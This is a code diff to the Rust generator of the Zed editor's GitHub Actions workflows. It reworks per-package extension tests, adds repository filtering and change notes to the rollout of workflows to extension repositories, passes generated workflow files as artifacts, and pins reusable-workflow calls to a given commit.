+ console.log(`Automerge enabled for PR #${prNumber} in zed-industries/extensions`);
+ "#},
+ ))
+ .add_env(("PR_NUMBER", pull_request_number.to_string()))
}
fn extension_workflow_secrets() -> (WorkflowSecret, WorkflowSecret) {
@@ -3,15 +3,13 @@ use indoc::indoc;
use crate::tasks::workflows::{
extension_bump::compare_versions,
- run_tests::{
- fetch_ts_query_ls, orchestrate_without_package_filter, run_ts_query_ls, tests_pass,
- },
+ run_tests::{fetch_ts_query_ls, orchestrate_for_extension, run_ts_query_ls, tests_pass},
runners,
steps::{
- self, CommonJobConditions, FluentBuilder, NamedJob, cache_rust_dependencies_namespace,
- named,
+ self, BASH_SHELL, CommonJobConditions, FluentBuilder, NamedJob,
+ cache_rust_dependencies_namespace, named,
},
- vars::{PathCondition, StepOutput, one_workflow_per_non_main_branch},
+ vars::{PathCondition, StepOutput, WorkflowInput, one_workflow_per_non_main_branch_and_token},
};
pub(crate) const ZED_EXTENSION_CLI_SHA: &str = "03d8e9aee95ea6117d75a48bcac2e19241f6e667";
@@ -25,8 +23,10 @@ pub(crate) fn extension_tests() -> Workflow {
let should_check_extension =
PathCondition::new("check_extension", r"^(extension\.toml|.*\.scm)$");
- let orchestrate =
- orchestrate_without_package_filter(&[&should_check_rust, &should_check_extension]);
+ let orchestrate = with_extension_defaults(orchestrate_for_extension(&[
+ &should_check_rust,
+ &should_check_extension,
+ ]));
let jobs = [
orchestrate,
@@ -34,11 +34,20 @@ pub(crate) fn extension_tests() -> Workflow {
should_check_extension.guard(check_extension()),
];
- let tests_pass = tests_pass(&jobs);
+ let tests_pass = tests_pass(&jobs, &[]);
+
+ let working_directory = WorkflowInput::string("working-directory", Some(".".to_owned()));
named::workflow()
- .add_event(Event::default().workflow_call(WorkflowCall::default()))
- .concurrency(one_workflow_per_non_main_branch())
+ .add_event(
+ Event::default().workflow_call(
+ WorkflowCall::default()
+ .add_input(working_directory.name, working_directory.call_input()),
+ ),
+ )
+ .concurrency(one_workflow_per_non_main_branch_and_token(
+ "extension-tests",
+ ))
.add_env(("CARGO_TERM_COLOR", "always"))
.add_env(("RUST_BACKTRACE", 1))
.add_env(("CARGO_INCREMENTAL", 0))
@@ -58,27 +67,66 @@ fn install_rust_target() -> Step<Run> {
named::bash(format!("rustup target add {EXTENSION_RUST_TARGET}",))
}
-fn run_clippy() -> Step<Run> {
- named::bash("cargo clippy --release --all-features -- --deny warnings")
+fn get_package_name() -> (Step<Run>, StepOutput) {
+ let step = named::bash(indoc! {r#"
+ PACKAGE_NAME="$(sed -n 's/^name = "\(.*\)"/\1/p' < Cargo.toml | head -1 | tr -d '[:space:]')"
+ echo "package_name=${PACKAGE_NAME}" >> "$GITHUB_OUTPUT"
+ "#})
+ .id("get-package-name");
+
+ let output = StepOutput::new(&step, "package_name");
+ (step, output)
+}
+
+fn cargo_fmt_package(package_name: &StepOutput) -> Step<Run> {
+ named::bash(r#"cargo fmt -p "$PACKAGE_NAME" -- --check"#)
+ .add_env(("PACKAGE_NAME", package_name.to_string()))
+}
+
+fn run_clippy(package_name: &StepOutput) -> Step<Run> {
+ named::bash(r#"cargo clippy -p "$PACKAGE_NAME" --release --all-features -- --deny warnings"#)
+ .add_env(("PACKAGE_NAME", package_name.to_string()))
+}
+
+fn run_nextest(package_name: &StepOutput) -> Step<Run> {
+ named::bash(
+ r#"cargo nextest run -p "$PACKAGE_NAME" --no-fail-fast --no-tests=warn --target "$(rustc -vV | sed -n 's|host: ||p')""#,
+ )
+ .add_env(("PACKAGE_NAME", package_name.to_string()))
+ .add_env(("NEXTEST_NO_TESTS", "warn"))
+}
+
+fn extension_job_defaults() -> Defaults {
+ Defaults::default().run(
+ RunDefaults::default()
+ .shell(BASH_SHELL)
+ .working_directory("${{ inputs.working-directory }}"),
+ )
+}
+
+fn with_extension_defaults(named_job: NamedJob) -> NamedJob {
+ NamedJob {
+ name: named_job.name,
+ job: named_job.job.defaults(extension_job_defaults()),
+ }
}
fn check_rust() -> NamedJob {
+ let (get_package, package_name) = get_package_name();
+
let job = Job::default()
+ .defaults(extension_job_defaults())
.with_repository_owner_guard()
.runs_on(runners::LINUX_LARGE_RAM)
.timeout_minutes(6u32)
.add_step(steps::checkout_repo())
.add_step(steps::cache_rust_dependencies_namespace())
.add_step(install_rust_target())
- .add_step(steps::cargo_fmt())
- .add_step(run_clippy())
+ .add_step(get_package)
+ .add_step(cargo_fmt_package(&package_name))
+ .add_step(run_clippy(&package_name))
.add_step(steps::cargo_install_nextest())
- .add_step(
- steps::cargo_nextest(runners::Platform::Linux)
- // Set the target to the current platform again
- .with_target("$(rustc -vV | sed -n 's|host: ||p')")
- .add_env(("NEXTEST_NO_TESTS", "warn")),
- );
+ .add_step(run_nextest(&package_name));
named::job(job)
}
@@ -88,6 +136,7 @@ pub(crate) fn check_extension() -> NamedJob {
let (check_version_job, version_changed, _) = compare_versions();
let job = Job::default()
+ .defaults(extension_job_defaults())
.with_repository_owner_guard()
.runs_on(runners::LINUX_LARGE_RAM)
.timeout_minutes(6u32)
@@ -124,8 +173,8 @@ pub fn download_zed_extension_cli(cache_hit: StepOutput) -> Step<Run> {
named::bash(
indoc! {
r#"
- wget --quiet "https://zed-extension-cli.nyc3.digitaloceanspaces.com/$ZED_EXTENSION_CLI_SHA/x86_64-unknown-linux-gnu/zed-extension"
- chmod +x zed-extension
+ wget --quiet "https://zed-extension-cli.nyc3.digitaloceanspaces.com/$ZED_EXTENSION_CLI_SHA/x86_64-unknown-linux-gnu/zed-extension" -O "$GITHUB_WORKSPACE/zed-extension"
+ chmod +x "$GITHUB_WORKSPACE/zed-extension"
"#,
}
).if_condition(Expression::new(format!("{} != 'true'", cache_hit.expr())))
@@ -136,7 +185,7 @@ pub fn check() -> Step<Run> {
r#"
mkdir -p /tmp/ext-scratch
mkdir -p /tmp/ext-output
- ./zed-extension --source-dir . --scratch-dir /tmp/ext-scratch --output-dir /tmp/ext-output
+ "$GITHUB_WORKSPACE/zed-extension" --source-dir . --scratch-dir /tmp/ext-scratch --output-dir /tmp/ext-output
"#
})
}
@@ -6,46 +6,72 @@ use indoc::indoc;
use serde_json::json;
use crate::tasks::workflows::steps::CheckoutStep;
+use crate::tasks::workflows::steps::cache_rust_dependencies_namespace;
+use crate::tasks::workflows::vars::JobOutput;
use crate::tasks::workflows::{
extension_bump::{RepositoryTarget, generate_token},
runners,
steps::{self, DEFAULT_REPOSITORY_OWNER_GUARD, NamedJob, named},
- vars::{self, StepOutput},
+ vars::{self, StepOutput, WorkflowInput},
};
const ROLLOUT_TAG_NAME: &str = "extension-workflows";
+const WORKFLOW_ARTIFACT_NAME: &str = "extension-workflow-files";
pub(crate) fn extension_workflow_rollout() -> Workflow {
- let fetch_repos = fetch_extension_repos();
- let rollout_workflows = rollout_workflows_to_extension(&fetch_repos);
- let create_tag = create_rollout_tag(&rollout_workflows);
+ let filter_repos_input = WorkflowInput::string("filter-repos", Some(String::new()))
+ .description(
+ "Comma-separated list of repository names to rollout to. Leave empty for all repos.",
+ );
+ let extra_context_input = WorkflowInput::string("change-description", Some(String::new()))
+ .description("Description for the changes to be expected with this rollout");
+
+ let (fetch_repos, removed_ci, removed_shared) = fetch_extension_repos(&filter_repos_input);
+ let rollout_workflows = rollout_workflows_to_extension(
+ &fetch_repos,
+ removed_ci,
+ removed_shared,
+ &extra_context_input,
+ );
+ let create_tag = create_rollout_tag(&rollout_workflows, &filter_repos_input);
named::workflow()
- .on(Event::default().workflow_dispatch(WorkflowDispatch::default()))
+ .on(Event::default().workflow_dispatch(
+ WorkflowDispatch::default()
+ .add_input(filter_repos_input.name, filter_repos_input.input())
+ .add_input(extra_context_input.name, extra_context_input.input()),
+ ))
.add_env(("CARGO_TERM_COLOR", "always"))
.add_job(fetch_repos.name, fetch_repos.job)
.add_job(rollout_workflows.name, rollout_workflows.job)
.add_job(create_tag.name, create_tag.job)
}
-fn fetch_extension_repos() -> NamedJob {
- fn get_repositories() -> (Step<Use>, StepOutput) {
+fn fetch_extension_repos(filter_repos_input: &WorkflowInput) -> (NamedJob, JobOutput, JobOutput) {
+ fn get_repositories(filter_repos_input: &WorkflowInput) -> (Step<Use>, StepOutput) {
let step = named::uses("actions", "github-script", "v7")
.id("list-repos")
.add_with((
"script",
- indoc::indoc! {r#"
- const repos = await github.paginate(github.rest.repos.listForOrg, {
+ formatdoc! {r#"
+ const repos = await github.paginate(github.rest.repos.listForOrg, {{
org: 'zed-extensions',
type: 'public',
per_page: 100,
- });
+ }});
- const filteredRepos = repos
+ let filteredRepos = repos
.filter(repo => !repo.archived)
.map(repo => repo.name);
- console.log(`Found ${filteredRepos.length} extension repos`);
+ const filterInput = `{filter_repos_input}`.trim();
+ if (filterInput.length > 0) {{
+ const allowedNames = filterInput.split(',').map(s => s.trim()).filter(s => s.length > 0);
+ filteredRepos = filteredRepos.filter(name => allowedNames.includes(name));
+ console.log(`Filter applied. Matched ${{filteredRepos.length}} repos from ${{allowedNames.length}} requested.`);
+ }}
+
+ console.log(`Found ${{filteredRepos.length}} extension repos`);
return filteredRepos;
"#},
))
@@ -56,36 +82,12 @@ fn fetch_extension_repos() -> NamedJob {
(step, filtered_repos)
}
- let (get_org_repositories, list_repos_output) = get_repositories();
-
- let job = Job::default()
- .cond(Expression::new(format!(
- "{DEFAULT_REPOSITORY_OWNER_GUARD} && github.ref == 'refs/heads/main'"
- )))
- .runs_on(runners::LINUX_SMALL)
- .timeout_minutes(5u32)
- .outputs([("repos".to_owned(), list_repos_output.to_string())])
- .add_step(get_org_repositories);
-
- named::job(job)
-}
-
-fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob {
fn checkout_zed_repo() -> CheckoutStep {
steps::checkout_repo()
.with_full_history()
- .with_path("zed")
.with_custom_name("checkout_zed_repo")
}
- fn checkout_extension_repo(token: &StepOutput) -> CheckoutStep {
- steps::checkout_repo()
- .with_custom_name("checkout_extension_repo")
- .with_token(token)
- .with_repository("zed-extensions/${{ matrix.repo }}")
- .with_path("extension")
- }
-
fn get_previous_tag_commit() -> (Step<Run>, StepOutput) {
let step = named::bash(formatdoc! {r#"
PREV_COMMIT=$(git rev-parse "{ROLLOUT_TAG_NAME}^{{commit}}" 2>/dev/null || echo "")
@@ -96,49 +98,127 @@ fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob {
echo "Found previous rollout at commit: $PREV_COMMIT"
echo "prev_commit=$PREV_COMMIT" >> "$GITHUB_OUTPUT"
"#})
- .id("prev-tag")
- .working_directory("zed");
+ .id("prev-tag");
let step_output = StepOutput::new(&step, "prev_commit");
(step, step_output)
}
- fn get_removed_files(prev_commit: &StepOutput) -> (Step<Run>, StepOutput) {
- let step = named::bash(indoc::indoc! {r#"
- if [ "$MATRIX_REPO" = "workflows" ]; then
- WORKFLOW_DIR="extensions/workflows"
- else
- WORKFLOW_DIR="extensions/workflows/shared"
- fi
-
- echo "Calculating changes from $PREV_COMMIT to HEAD for $WORKFLOW_DIR"
+ fn get_removed_files(prev_commit: &StepOutput) -> (Step<Run>, StepOutput, StepOutput) {
+ let step = named::bash(indoc! {r#"
+ for workflow_type in "ci" "shared"; do
+ if [ "$workflow_type" = "ci" ]; then
+ WORKFLOW_DIR="extensions/workflows"
+ else
+ WORKFLOW_DIR="extensions/workflows/shared"
+ fi
+
+ REMOVED=$(git diff --name-status -M "$PREV_COMMIT" HEAD -- "$WORKFLOW_DIR" | \
+ awk '/^D/ { print $2 } /^R/ { print $2 }' | \
+ xargs -I{} basename {} 2>/dev/null | \
+ tr '\n' ' ' || echo "")
+ REMOVED=$(echo "$REMOVED" | xargs)
+
+ echo "Removed files for $workflow_type: $REMOVED"
+ echo "removed_${workflow_type}=$REMOVED" >> "$GITHUB_OUTPUT"
+ done
+ "#})
+ .id("calc-changes")
+ .add_env(("PREV_COMMIT", prev_commit.to_string()));
- # Get deleted files (status D) and renamed files (status R - old name needs removal)
- # Using -M to detect renames, then extracting files that are gone from their original location
- REMOVED_FILES=$(git diff --name-status -M "$PREV_COMMIT" HEAD -- "$WORKFLOW_DIR" | \
- awk '/^D/ { print $2 } /^R/ { print $2 }' | \
- xargs -I{} basename {} 2>/dev/null | \
- tr '\n' ' ' || echo "")
+ // These are created in the for-loop above and thus do exist
+ let removed_ci = StepOutput::new_unchecked(&step, "removed_ci");
+ let removed_shared = StepOutput::new_unchecked(&step, "removed_shared");
- REMOVED_FILES=$(echo "$REMOVED_FILES" | xargs)
+ (step, removed_ci, removed_shared)
+ }
- echo "Files to remove: $REMOVED_FILES"
- echo "removed_files=$REMOVED_FILES" >> "$GITHUB_OUTPUT"
+ fn generate_workflow_files() -> Step<Run> {
+ named::bash(indoc! {r#"
+ cargo xtask workflows "$COMMIT_SHA"
"#})
- .id("calc-changes")
- .working_directory("zed")
- .add_env(("PREV_COMMIT", prev_commit.to_string()))
- .add_env(("MATRIX_REPO", "${{ matrix.repo }}"));
+ .add_env(("COMMIT_SHA", "${{ github.sha }}"))
+ }
- let removed_files = StepOutput::new(&step, "removed_files");
+ fn upload_workflow_files() -> Step<Use> {
+ named::uses(
+ "actions",
+ "upload-artifact",
+ "330a01c490aca151604b8cf639adc76d48f6c5d4", // v5
+ )
+ .add_with(("name", WORKFLOW_ARTIFACT_NAME))
+ .add_with(("path", "extensions/workflows/**/*.yml"))
+ .add_with(("if-no-files-found", "error"))
+ }
- (step, removed_files)
+ let (get_org_repositories, list_repos_output) = get_repositories(filter_repos_input);
+ let (get_prev_tag, prev_commit) = get_previous_tag_commit();
+ let (calc_changes, removed_ci, removed_shared) = get_removed_files(&prev_commit);
+
+ let job = Job::default()
+ .cond(Expression::new(format!(
+ "{DEFAULT_REPOSITORY_OWNER_GUARD} && github.ref == 'refs/heads/main'"
+ )))
+ .runs_on(runners::LINUX_SMALL)
+ .timeout_minutes(10u32)
+ .outputs([
+ ("repos".to_owned(), list_repos_output.to_string()),
+ ("prev_commit".to_owned(), prev_commit.to_string()),
+ ("removed_ci".to_owned(), removed_ci.to_string()),
+ ("removed_shared".to_owned(), removed_shared.to_string()),
+ ])
+ .add_step(checkout_zed_repo())
+ .add_step(get_prev_tag)
+ .add_step(calc_changes)
+ .add_step(get_org_repositories)
+ .add_step(cache_rust_dependencies_namespace())
+ .add_step(generate_workflow_files())
+ .add_step(upload_workflow_files());
+
+ let job = named::job(job);
+ let (removed_ci, removed_shared) = (
+ removed_ci.as_job_output(&job),
+ removed_shared.as_job_output(&job),
+ );
+
+ (job, removed_ci, removed_shared)
+}
+
+fn rollout_workflows_to_extension(
+ fetch_repos_job: &NamedJob,
+ removed_ci: JobOutput,
+ removed_shared: JobOutput,
+ extra_context_input: &WorkflowInput,
+) -> NamedJob {
+ fn checkout_extension_repo(token: &StepOutput) -> CheckoutStep {
+ steps::checkout_repo()
+ .with_custom_name("checkout_extension_repo")
+ .with_token(token)
+ .with_repository("zed-extensions/${{ matrix.repo }}")
+ .with_path("extension")
+ }
+
+ fn download_workflow_files() -> Step<Use> {
+ named::uses(
+ "actions",
+ "download-artifact",
+ "018cc2cf5baa6db3ef3c5f8a56943fffe632ef53", // v6.0.0
+ )
+ .add_with(("name", WORKFLOW_ARTIFACT_NAME))
+ .add_with(("path", "workflow-files"))
}
- fn sync_workflow_files(removed_files: &StepOutput) -> Step<Run> {
- named::bash(indoc::indoc! {r#"
+ fn sync_workflow_files(removed_ci: JobOutput, removed_shared: JobOutput) -> Step<Run> {
+ named::bash(indoc! {r#"
mkdir -p extension/.github/workflows
+
+ if [ "$MATRIX_REPO" = "workflows" ]; then
+ REMOVED_FILES="$REMOVED_CI"
+ else
+ REMOVED_FILES="$REMOVED_SHARED"
+ fi
+
cd extension/.github/workflows
if [ -n "$REMOVED_FILES" ]; then
@@ -152,40 +232,46 @@ fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob {
cd - > /dev/null
if [ "$MATRIX_REPO" = "workflows" ]; then
- cp zed/extensions/workflows/*.yml extension/.github/workflows/
+ cp workflow-files/*.yml extension/.github/workflows/
else
- cp zed/extensions/workflows/shared/*.yml extension/.github/workflows/
+ cp workflow-files/shared/*.yml extension/.github/workflows/
fi
"#})
- .add_env(("REMOVED_FILES", removed_files.to_string()))
+ .add_env(("REMOVED_CI", removed_ci))
+ .add_env(("REMOVED_SHARED", removed_shared))
.add_env(("MATRIX_REPO", "${{ matrix.repo }}"))
}
fn get_short_sha() -> (Step<Run>, StepOutput) {
- let step = named::bash(indoc::indoc! {r#"
- echo "sha_short=$(git rev-parse --short=7 HEAD)" >> "$GITHUB_OUTPUT"
+ let step = named::bash(indoc! {r#"
+ echo "sha_short=$(echo "$GITHUB_SHA" | cut -c1-7)" >> "$GITHUB_OUTPUT"
"#})
- .id("short-sha")
- .working_directory("zed");
+ .id("short-sha");
let step_output = StepOutput::new(&step, "sha_short");
(step, step_output)
}
- fn create_pull_request(token: &StepOutput, short_sha: &StepOutput) -> Step<Use> {
+ fn create_pull_request(
+ token: &StepOutput,
+ short_sha: &StepOutput,
+ context_input: &WorkflowInput,
+ ) -> Step<Use> {
let title = format!("Update CI workflows to `{short_sha}`");
+ let body = formatdoc! {r#"
+ This PR updates the CI workflow files from the main Zed repository
+ based on the commit zed-industries/zed@${{{{ github.sha }}}}
+
+ {context_input}
+ "#,
+ };
+
named::uses("peter-evans", "create-pull-request", "v7")
.add_with(("path", "extension"))
.add_with(("title", title.clone()))
- .add_with((
- "body",
- indoc::indoc! {r#"
- This PR updates the CI workflow files from the main Zed repository
- based on the commit zed-industries/zed@${{ github.sha }}
- "#},
- ))
+ .add_with(("body", body))
.add_with(("commit-message", title))
.add_with(("branch", "update-workflows"))
.add_with((
@@ -204,12 +290,12 @@ fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob {
}
fn enable_auto_merge(token: &StepOutput) -> Step<gh_workflow::Run> {
- named::bash(indoc::indoc! {r#"
+ named::bash(indoc! {r#"
if [ -n "$PR_NUMBER" ]; then
- cd extension
gh pr merge "$PR_NUMBER" --auto --squash
fi
"#})
+ .working_directory("extension")
.add_env(("GH_TOKEN", token.to_string()))
.add_env((
"PR_NUMBER",
@@ -228,8 +314,6 @@ fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob {
]),
),
);
- let (get_prev_tag, prev_commit) = get_previous_tag_commit();
- let (calc_changes, removed_files) = get_removed_files(&prev_commit);
let (calculate_short_sha, short_sha) = get_short_sha();
let job = Job::default()
@@ -249,19 +333,17 @@ fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob {
})),
)
.add_step(authenticate)
- .add_step(checkout_zed_repo())
.add_step(checkout_extension_repo(&token))
- .add_step(get_prev_tag)
- .add_step(calc_changes)
- .add_step(sync_workflow_files(&removed_files))
+ .add_step(download_workflow_files())
+ .add_step(sync_workflow_files(removed_ci, removed_shared))
.add_step(calculate_short_sha)
- .add_step(create_pull_request(&token, &short_sha))
+ .add_step(create_pull_request(&token, &short_sha, extra_context_input))
.add_step(enable_auto_merge(&token));
named::job(job)
}
-fn create_rollout_tag(rollout_job: &NamedJob) -> NamedJob {
+fn create_rollout_tag(rollout_job: &NamedJob, filter_repos_input: &WorkflowInput) -> NamedJob {
fn checkout_zed_repo(token: &StepOutput) -> CheckoutStep {
steps::checkout_repo().with_full_history().with_token(token)
}
@@ -297,6 +379,10 @@ fn create_rollout_tag(rollout_job: &NamedJob) -> NamedJob {
let job = Job::default()
.needs([rollout_job.name.clone()])
+ .cond(Expression::new(format!(
+ "{filter_repos} == ''",
+ filter_repos = filter_repos_input.expr(),
+ )))
.runs_on(runners::LINUX_SMALL)
.timeout_minutes(1u32)
.add_step(authenticate)
@@ -5,17 +5,18 @@ use gh_workflow::{
use indoc::indoc;
use crate::tasks::workflows::{
+ GenerateWorkflowArgs, GitSha,
extensions::WithAppSecrets,
runners,
steps::{CommonJobConditions, NamedJob, named},
vars::{JobOutput, StepOutput, one_workflow_per_non_main_branch_and_token},
};
-pub(crate) fn bump_version() -> Workflow {
+pub(crate) fn bump_version(args: &GenerateWorkflowArgs) -> Workflow {
let (determine_bump_type, bump_type) = determine_bump_type();
let bump_type = bump_type.as_job_output(&determine_bump_type);
- let call_bump_version = call_bump_version(&determine_bump_type, bump_type);
+ let call_bump_version = call_bump_version(args.sha.as_ref(), &determine_bump_type, bump_type);
named::workflow()
.on(Event::default()
@@ -32,6 +33,7 @@ pub(crate) fn bump_version() -> Workflow {
}
pub(crate) fn call_bump_version(
+ target_ref: Option<&GitSha>,
depending_job: &NamedJob,
bump_type: JobOutput,
) -> NamedJob<UsesJob> {
@@ -51,7 +53,7 @@ pub(crate) fn call_bump_version(
"zed-industries",
"zed",
".github/workflows/extension_bump.yml",
- "main",
+ target_ref.map_or("main", AsRef::as_ref),
)
.add_need(depending_job.name.clone())
.with(
@@ -1,12 +1,13 @@
use gh_workflow::{Event, Job, Level, Permissions, PullRequest, Push, UsesJob, Workflow};
use crate::tasks::workflows::{
+ GenerateWorkflowArgs, GitSha,
steps::{NamedJob, named},
vars::one_workflow_per_non_main_branch_and_token,
};
-pub(crate) fn run_tests() -> Workflow {
- let call_extension_tests = call_extension_tests();
+pub(crate) fn run_tests(args: &GenerateWorkflowArgs) -> Workflow {
+ let call_extension_tests = call_extension_tests(args.sha.as_ref());
named::workflow()
.on(Event::default()
.pull_request(PullRequest::default().add_branch("**"))
@@ -15,14 +16,14 @@ pub(crate) fn run_tests() -> Workflow {
.add_job(call_extension_tests.name, call_extension_tests.job)
}
-pub(crate) fn call_extension_tests() -> NamedJob<UsesJob> {
+pub(crate) fn call_extension_tests(target_ref: Option<&GitSha>) -> NamedJob<UsesJob> {
let job = Job::default()
.permissions(Permissions::default().contents(Level::Read))
.uses(
"zed-industries",
"zed",
".github/workflows/extension_tests.yml",
- "main",
+ target_ref.map_or("main", AsRef::as_ref),
);
named::job(job)
@@ -16,9 +16,9 @@ pub(crate) fn release() -> Workflow {
let macos_tests = run_tests::run_platform_tests_no_filter(Platform::Mac);
let linux_tests = run_tests::run_platform_tests_no_filter(Platform::Linux);
let windows_tests = run_tests::run_platform_tests_no_filter(Platform::Windows);
- let macos_clippy = run_tests::clippy(Platform::Mac);
- let linux_clippy = run_tests::clippy(Platform::Linux);
- let windows_clippy = run_tests::clippy(Platform::Windows);
+ let macos_clippy = run_tests::clippy(Platform::Mac, None);
+ let linux_clippy = run_tests::clippy(Platform::Linux, None);
+ let windows_clippy = run_tests::clippy(Platform::Windows, None);
let check_scripts = run_tests::check_scripts();
let create_draft_release = create_draft_release();
@@ -18,7 +18,7 @@ pub fn release_nightly() -> Workflow {
let style = check_style();
// run only on windows as that's our fastest platform right now.
let tests = run_platform_tests_no_filter(Platform::Windows);
- let clippy_job = clippy(Platform::Windows);
+ let clippy_job = clippy(Platform::Windows, None);
let nightly = Some(ReleaseChannel::Nightly);
let bundle = ReleaseBundleJobs {
@@ -1,9 +1,10 @@
use gh_workflow::{
- Concurrency, Container, Event, Expression, Job, Port, PullRequest, Push, Run, Step, Use,
- Workflow,
+ Concurrency, Container, Event, Expression, Input, Job, Level, Permissions, Port, PullRequest,
+ Push, Run, Step, Strategy, Use, UsesJob, Workflow,
};
use indexmap::IndexMap;
use indoc::formatdoc;
+use serde_json::json;
use crate::tasks::workflows::{
steps::{
@@ -14,7 +15,7 @@ use crate::tasks::workflows::{
};
use super::{
- runners::{self, Platform},
+ runners::{self, Arch, Platform},
steps::{self, FluentBuilder, NamedJob, named, release_job},
};
@@ -24,9 +25,10 @@ pub(crate) fn run_tests() -> Workflow {
// - script/update_top_ranking_issues/
// - .github/ISSUE_TEMPLATE/
// - .github/workflows/ (except .github/workflows/ci.yml)
+ // - extensions/ (these have their own test workflow)
let should_run_tests = PathCondition::inverted(
"run_tests",
- r"^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests)))",
+ r"^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests))|extensions/)",
);
let should_check_docs = PathCondition::new("run_docs", r"^(docs/|crates/.*\.rs)");
let should_check_scripts = PathCondition::new(
@@ -46,9 +48,10 @@ pub(crate) fn run_tests() -> Workflow {
let mut jobs = vec![
orchestrate,
check_style(),
- should_run_tests.guard(clippy(Platform::Windows)),
- should_run_tests.guard(clippy(Platform::Linux)),
- should_run_tests.guard(clippy(Platform::Mac)),
+ should_run_tests.guard(clippy(Platform::Windows, None)),
+ should_run_tests.guard(clippy(Platform::Linux, None)),
+ should_run_tests.guard(clippy(Platform::Mac, None)),
+ should_run_tests.guard(clippy(Platform::Mac, Some(Arch::X86_64))),
should_run_tests.guard(run_platform_tests(Platform::Windows)),
should_run_tests.guard(run_platform_tests(Platform::Linux)),
should_run_tests.guard(run_platform_tests(Platform::Mac)),
@@ -60,7 +63,8 @@ pub(crate) fn run_tests() -> Workflow {
should_check_licences.guard(check_licenses()),
should_check_scripts.guard(check_scripts()),
];
- let tests_pass = tests_pass(&jobs);
+ let ext_tests = extension_tests();
+ let tests_pass = tests_pass(&jobs, &[&ext_tests.name]);
jobs.push(should_run_tests.guard(check_postgres_and_protobuf_migrations())); // could be more specific here?
@@ -91,20 +95,32 @@ pub(crate) fn run_tests() -> Workflow {
}
workflow
})
+ .add_job(ext_tests.name, ext_tests.job)
.add_job(tests_pass.name, tests_pass.job)
}
+/// Controls which features `orchestrate_impl` includes in the generated script.
+#[derive(PartialEq, Eq)]
+enum OrchestrateTarget {
+ /// For the main Zed repo: includes the cargo package filter and extension
+ /// change detection, but no working-directory scoping.
+ ZedRepo,
+ /// For individual extension repos: scopes changed-file detection to the
+ /// working directory, with no package filter or extension detection.
+ Extension,
+}
+
// Generates a bash script that checks changed files against regex patterns
// and sets GitHub output variables accordingly
pub fn orchestrate(rules: &[&PathCondition]) -> NamedJob {
- orchestrate_impl(rules, true)
+ orchestrate_impl(rules, OrchestrateTarget::ZedRepo)
}
-pub fn orchestrate_without_package_filter(rules: &[&PathCondition]) -> NamedJob {
- orchestrate_impl(rules, false)
+pub fn orchestrate_for_extension(rules: &[&PathCondition]) -> NamedJob {
+ orchestrate_impl(rules, OrchestrateTarget::Extension)
}
-fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> NamedJob {
+fn orchestrate_impl(rules: &[&PathCondition], target: OrchestrateTarget) -> NamedJob {
let name = "orchestrate".to_owned();
let step_name = "filter".to_owned();
let mut script = String::new();
@@ -121,6 +137,22 @@ fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> N
fi
CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")"
+ "#});
+
+ if target == OrchestrateTarget::Extension {
+ script.push_str(indoc::indoc! {r#"
+ # When running from a subdirectory, git diff returns repo-root-relative paths.
+ # Filter to only files within the current working directory and strip the prefix.
+ REPO_SUBDIR="$(git rev-parse --show-prefix)"
+ REPO_SUBDIR="${REPO_SUBDIR%/}"
+ if [ -n "$REPO_SUBDIR" ]; then
+ CHANGED_FILES="$(echo "$CHANGED_FILES" | grep "^${REPO_SUBDIR}/" | sed "s|^${REPO_SUBDIR}/||" || true)"
+ fi
+
+ "#});
+ }
+
+ script.push_str(indoc::indoc! {r#"
check_pattern() {
local output_name="$1"
local pattern="$2"
@@ -135,7 +167,7 @@ fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> N
let mut outputs = IndexMap::new();
- if include_package_filter {
+ if target == OrchestrateTarget::ZedRepo {
script.push_str(indoc::indoc! {r#"
# Check for changes that require full rebuild (no filter)
# Direct pushes to main/stable/preview always run full suite
@@ -221,6 +253,16 @@ fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> N
));
}
+ if target == OrchestrateTarget::ZedRepo {
+ script.push_str(DETECT_CHANGED_EXTENSIONS_SCRIPT);
+ script.push_str("echo \"changed_extensions=$EXTENSIONS_JSON\" >> \"$GITHUB_OUTPUT\"\n");
+
+ outputs.insert(
+ "changed_extensions".to_owned(),
+ format!("${{{{ steps.{}.outputs.changed_extensions }}}}", step_name),
+ );
+ }
+
let job = Job::default()
.runs_on(runners::LINUX_SMALL)
.with_repository_owner_guard()
@@ -231,7 +273,7 @@ fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> N
NamedJob { name, job }
}
-pub fn tests_pass(jobs: &[NamedJob]) -> NamedJob {
+pub fn tests_pass(jobs: &[NamedJob], extra_job_names: &[&str]) -> NamedJob {
let mut script = String::from(indoc::indoc! {r#"
set +x
EXIT_CODE=0
@@ -243,20 +285,26 @@ pub fn tests_pass(jobs: &[NamedJob]) -> NamedJob {
"#});
- let env_entries: Vec<_> = jobs
+ let all_names: Vec<&str> = jobs
.iter()
- .map(|job| {
- let env_name = format!("RESULT_{}", job.name.to_uppercase());
- let env_value = format!("${{{{ needs.{}.result }}}}", job.name);
+ .map(|job| job.name.as_str())
+ .chain(extra_job_names.iter().copied())
+ .collect();
+
+ let env_entries: Vec<_> = all_names
+ .iter()
+ .map(|name| {
+ let env_name = format!("RESULT_{}", name.to_uppercase());
+ let env_value = format!("${{{{ needs.{}.result }}}}", name);
(env_name, env_value)
})
.collect();
script.push_str(
- &jobs
+ &all_names
.iter()
.zip(env_entries.iter())
- .map(|(job, (env_name, _))| format!("check_result \"{}\" \"${}\"", job.name, env_name))
+ .map(|(name, (env_name, _))| format!("check_result \"{}\" \"${}\"", name, env_name))
.collect::<Vec<_>>()
.join("\n"),
);
@@ -266,8 +314,9 @@ pub fn tests_pass(jobs: &[NamedJob]) -> NamedJob {
let job = Job::default()
.runs_on(runners::LINUX_SMALL)
.needs(
- jobs.iter()
- .map(|j| j.name.to_string())
+ all_names
+ .iter()
